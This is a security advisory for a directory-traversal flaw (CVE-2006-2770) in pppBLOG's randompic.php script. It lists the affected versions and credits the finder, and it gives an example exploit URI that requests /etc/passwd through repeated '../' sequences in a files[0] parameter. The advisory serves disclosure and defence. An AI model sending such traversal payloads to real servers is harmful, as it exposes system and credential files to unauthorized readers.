BID:18189

PPPBlog Randompic.PHP Directory Traversal Vulnerability

CVE-2006-2770 |

Info

PPPBlog Randompic.PHP Directory Traversal Vulnerability

Bugtraq ID:	18189
Class:	Input Validation Error
CVE:	CVE-2006-2770
Remote:	Yes
Local:	No
Published:	May 31 2006 12:00AM
Updated:	Nov 05 2008 04:55PM
Credit:	rgod is credited with the discovery of this vulnerability.
Vulnerable:	pppBLOG pppBLOG 0.3.11 pppBLOG pppBLOG 0.3.8

Not Vulnerable:

Discussion

PPPBlog Randompic.PHP Directory Traversal Vulnerability

pppBlog is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid the attacker in further attacks.

Exploit / POC

PPPBlog Randompic.PHP Directory Traversal Vulnerability

This vulnerability may be exploited via a browser.

The following exploit and example URIs are available:

http://www.example.com/randompic.php?files[0]=../../../../../../../../../../etc/passwd
http://www.example.com/randompic.php?files[0]=[file]

/data/vulnerabilities/exploits/pppBLOG-0531-dtv.txt

Solution / Fix

PPPBlog Randompic.PHP Directory Traversal Vulnerability

Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].

References

PPPBlog Randompic.PHP Directory Traversal Vulnerability

References:

pppBLOG Homepage (pppBLOG)
pppBlog <= 0.3.8 administrative credentials/system disclosure (rgod)